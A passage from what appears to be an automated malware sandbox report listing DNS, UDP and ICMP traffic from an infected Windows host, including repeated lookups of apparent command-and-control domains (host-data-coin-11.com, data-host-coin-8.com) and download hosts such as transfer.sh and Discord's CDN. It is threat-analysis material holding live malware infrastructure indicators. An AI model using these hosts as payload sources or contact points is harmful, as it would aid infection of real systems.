                                                                                                                                  Jan 11, 2022 23:38:58.901601076 CET53618918.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:59.092618942 CET6158553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:59.110826969 CET53615858.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:59.309293032 CET6516353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:59.336113930 CET53651638.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:03.259013891 CET5896953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:03.277842999 CET53589698.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:03.595026970 CET5397753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:03.613953114 CET53539778.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:03.828819990 CET5714753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:03.847063065 CET53571478.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:04.048610926 CET5238153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:04.065174103 CET53523818.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:04.267952919 CET4923153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:04.286421061 CET53492318.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:04.501553059 CET5321753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:04.520158052 CET53532178.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:06.259181023 CET5255453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:06.277893066 CET53525548.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:06.489258051 CET4960353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:06.508352995 CET53496038.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:06.753695011 CET4997553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:06.772353888 CET53499758.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:07.659946918 CET5770153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:07.680752039 CET53577018.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:09.044616938 CET6033453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:09.064064026 CET53603348.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:09.277977943 CET6495853192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:09.294975996 CET53649588.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:09.526087999 CET5850453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:09.547288895 CET53585048.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:13.088238955 CET6497153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:13.106859922 CET53649718.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:13.321470022 CET5804153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:13.340722084 CET53580418.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:13.559309006 CET5776453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:13.577246904 CET53577648.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:13.764748096 CET5797353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:13.783409119 CET53579738.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:15.988997936 CET4986253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:16.007565975 CET53498628.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:16.222690105 CET5011953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:16.239685059 CET53501198.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:16.454155922 CET6015953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:16.470243931 CET53601598.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:17.292241096 CET4946453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:17.308588982 CET53494648.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:27.206513882 CET6081353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:27.225406885 CET53608138.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:39:35.816204071 CET5093053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:39:35.920794010 CET53509308.8.8.8192.168.2.5

                                                                                                                                  ICMP Packets

                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                  Jan 11, 2022 23:38:16.516896963 CET192.168.2.58.8.8.8d000(Port unreachable)Destination Unreachable
                                                                                                                                  Jan 11, 2022 23:38:17.520821095 CET192.168.2.58.8.8.8d000(Port unreachable)Destination Unreachable
                                                                                                                                  Jan 11, 2022 23:38:29.058418036 CET188.166.28.199192.168.2.59937(Unknown)Destination Unreachable
                                                                                                                                  Jan 11, 2022 23:38:32.080615044 CET188.166.28.199192.168.2.59937(Unknown)Destination Unreachable
                                                                                                                                  Jan 11, 2022 23:38:38.095956087 CET188.166.28.199192.168.2.59937(Unknown)Destination Unreachable

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Jan 11, 2022 23:38:03.017657995 CET192.168.2.58.8.8.80xf4acStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:03.545509100 CET192.168.2.58.8.8.80x409aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.079605103 CET192.168.2.58.8.8.80xf0b8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.296652079 CET192.168.2.58.8.8.80x5408Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.533118010 CET192.168.2.58.8.8.80xfc98Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.759929895 CET192.168.2.58.8.8.80x54e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:06.529057980 CET192.168.2.58.8.8.80xfd3bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:06.796454906 CET192.168.2.58.8.8.80xddc5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:07.038542032 CET192.168.2.58.8.8.80x25f9Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.036716938 CET192.168.2.58.8.8.80xaa12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.285840988 CET192.168.2.58.8.8.80xeae9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.571583986 CET192.168.2.58.8.8.80x45ddStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:11.227777958 CET192.168.2.58.8.8.80x8668Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:11.451437950 CET192.168.2.58.8.8.80x864fStandard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:12.477133989 CET192.168.2.58.8.8.80x864fStandard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:13.477196932 CET192.168.2.58.8.8.80x864fStandard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:15.486813068 CET192.168.2.58.8.8.80xf229Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.017404079 CET192.168.2.58.8.8.80x1d45Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.082583904 CET192.168.2.58.8.8.80x5fa1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.301465034 CET192.168.2.58.8.8.80xf396Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.516854048 CET192.168.2.58.8.8.80xc883Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.774789095 CET192.168.2.58.8.8.80x54a3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:17.067862988 CET192.168.2.58.8.8.80x14c1Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:19.461798906 CET192.168.2.58.8.8.80xfa6bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:19.679070950 CET192.168.2.58.8.8.80x7e50Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:20.219146013 CET192.168.2.58.8.8.80x443fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:20.747652054 CET192.168.2.58.8.8.80x556fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:24.468498945 CET192.168.2.58.8.8.80x1985Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:24.776793957 CET192.168.2.58.8.8.80x3ca4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:25.961724043 CET192.168.2.58.8.8.80x475eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.240366936 CET192.168.2.58.8.8.80x78d1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.058054924 CET192.168.2.58.8.8.80xa8cbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.265362024 CET192.168.2.58.8.8.80x25efStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.526974916 CET192.168.2.58.8.8.80x7ee7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.787939072 CET192.168.2.58.8.8.80x59b3Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:45.434201956 CET192.168.2.58.8.8.80x84d7Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.110027075 CET192.168.2.58.8.8.80xa1c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.346180916 CET192.168.2.58.8.8.80x1d7fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.645617008 CET192.168.2.58.8.8.80x576cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.869935036 CET192.168.2.58.8.8.80x54aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.099832058 CET192.168.2.58.8.8.80x84e4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.353813887 CET192.168.2.58.8.8.80x2f8dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.867629051 CET192.168.2.58.8.8.80x53bcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:52.134732962 CET192.168.2.58.8.8.80xa397Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.401673079 CET192.168.2.58.8.8.80x8601Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.616319895 CET192.168.2.58.8.8.80x4c3bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.854727983 CET192.168.2.58.8.8.80xbc37Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.068715096 CET192.168.2.58.8.8.80xe294Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.286040068 CET192.168.2.58.8.8.80x1f99Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.523319006 CET192.168.2.58.8.8.80x53edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.750534058 CET192.168.2.58.8.8.80xea9fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.008507967 CET192.168.2.58.8.8.80x540Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.240472078 CET192.168.2.58.8.8.80xe785Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.490434885 CET192.168.2.58.8.8.80x9eceStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.973521948 CET192.168.2.58.8.8.80x4fc0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.205034018 CET192.168.2.58.8.8.80x6a10Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.669754982 CET192.168.2.58.8.8.80x6709Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:58.881891012 CET192.168.2.58.8.8.80x6583Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:59.092618942 CET192.168.2.58.8.8.80x5f57Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:59.309293032 CET192.168.2.58.8.8.80xa4f9Standard query (0)softwaresworld.netA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.259013891 CET192.168.2.58.8.8.80x39e1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.595026970 CET192.168.2.58.8.8.80xcae9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:03.828819990 CET192.168.2.58.8.8.80x8ea3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.048610926 CET192.168.2.58.8.8.80xc094Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.267952919 CET192.168.2.58.8.8.80xc787Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:04.501553059 CET192.168.2.58.8.8.80xc457Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.259181023 CET192.168.2.58.8.8.80x1395Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.489258051 CET192.168.2.58.8.8.80x29d3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:06.753695011 CET192.168.2.58.8.8.80xacf4Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:07.659946918 CET192.168.2.58.8.8.80xfdcaStandard query (0)noc.socialA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.044616938 CET192.168.2.58.8.8.80xcac3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.277977943 CET192.168.2.58.8.8.80xb0feStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:09.526087999 CET192.168.2.58.8.8.80x495cStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.088238955 CET192.168.2.58.8.8.80x58e3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.321470022 CET192.168.2.58.8.8.80x704cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.559309006 CET192.168.2.58.8.8.80x9ef8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:13.764748096 CET192.168.2.58.8.8.80xf586Standard query (0)sehfdkfjvgn.xyzA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:15.988997936 CET192.168.2.58.8.8.80x14e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:16.222690105 CET192.168.2.58.8.8.80xabc0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:16.454155922 CET192.168.2.58.8.8.80x8856Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:17.292241096 CET192.168.2.58.8.8.80xfed8Standard query (0)noc.socialA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:27.206513882 CET192.168.2.58.8.8.80x865eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:39:35.816204071 CET192.168.2.58.8.8.80xdc1aStandard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Jan 11, 2022 23:38:03.331307888 CET8.8.8.8192.168.2.50xf4acNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:03.869954109 CET8.8.8.8192.168.2.50x409aNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.098866940 CET8.8.8.8192.168.2.50xf0b8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.315464020 CET8.8.8.8192.168.2.50x5408No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:04.552700043 CET8.8.8.8192.168.2.50xfc98No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:05.082539082 CET8.8.8.8192.168.2.50x54e8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:06.547424078 CET8.8.8.8192.168.2.50xfd3bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:06.815184116 CET8.8.8.8192.168.2.50xddc5No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:07.361876011 CET8.8.8.8192.168.2.50x25f9No error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.053680897 CET8.8.8.8192.168.2.50xaa12No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.302181959 CET8.8.8.8192.168.2.50xeae9No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:10.895371914 CET8.8.8.8192.168.2.50x45ddNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:11.244395018 CET8.8.8.8192.168.2.50x8668No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:15.475125074 CET8.8.8.8192.168.2.50x864fServer failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:15.809180021 CET8.8.8.8192.168.2.50xf229No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.033747911 CET8.8.8.8192.168.2.50x1d45No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.099036932 CET8.8.8.8192.168.2.50x5fa1No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.320013046 CET8.8.8.8192.168.2.50xf396No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.514472008 CET8.8.8.8192.168.2.50x864fServer failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.535861969 CET8.8.8.8192.168.2.50xc883No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:16.793469906 CET8.8.8.8192.168.2.50x54a3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:17.086301088 CET8.8.8.8192.168.2.50x14c1No error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:17.520761967 CET8.8.8.8192.168.2.50x864fServer failure (2)privacytools-foryou-777.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:19.480447054 CET8.8.8.8192.168.2.50xfa6bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:19.993455887 CET8.8.8.8192.168.2.50x7e50No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:20.515546083 CET8.8.8.8192.168.2.50x443fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:20.766339064 CET8.8.8.8192.168.2.50x556fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:24.485481024 CET8.8.8.8192.168.2.50x1985No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:24.795237064 CET8.8.8.8192.168.2.50x3ca4No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:25.978157997 CET8.8.8.8192.168.2.50x475eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET8.8.8.8192.168.2.50x78d1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET8.8.8.8192.168.2.50x78d1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET8.8.8.8192.168.2.50x78d1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET8.8.8.8192.168.2.50x78d1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET8.8.8.8192.168.2.50x78d1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.076913118 CET8.8.8.8192.168.2.50xa8cbNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.282282114 CET8.8.8.8192.168.2.50x25efNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:28.813486099 CET8.8.8.8192.168.2.50x7ee7No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET8.8.8.8192.168.2.50x59b3No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:45.752964973 CET8.8.8.8192.168.2.50x84d7No error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.128654003 CET8.8.8.8192.168.2.50xa1c6No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.362932920 CET8.8.8.8192.168.2.50x1d7fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.664134026 CET8.8.8.8192.168.2.50x576cNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:50.889480114 CET8.8.8.8192.168.2.50x54aeNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.118419886 CET8.8.8.8192.168.2.50x84e4No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.677670002 CET8.8.8.8192.168.2.50x2f8dNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:51.886497021 CET8.8.8.8192.168.2.50x53bcNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:52.456685066 CET8.8.8.8192.168.2.50xa397No error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.421308041 CET8.8.8.8192.168.2.50x8601No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.635956049 CET8.8.8.8192.168.2.50x4c3bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:55.873291016 CET8.8.8.8192.168.2.50xbc37No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.087754011 CET8.8.8.8192.168.2.50xe294No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.304600000 CET8.8.8.8192.168.2.50x1f99No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.542190075 CET8.8.8.8192.168.2.50x53edNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:56.769058943 CET8.8.8.8192.168.2.50xea9fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.027409077 CET8.8.8.8192.168.2.50x540No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.260200977 CET8.8.8.8192.168.2.50xe785No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                                                                                  Jan 11, 2022 23:38:57.512974024 CET8.8.8.8192.168.2.50x9eceNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
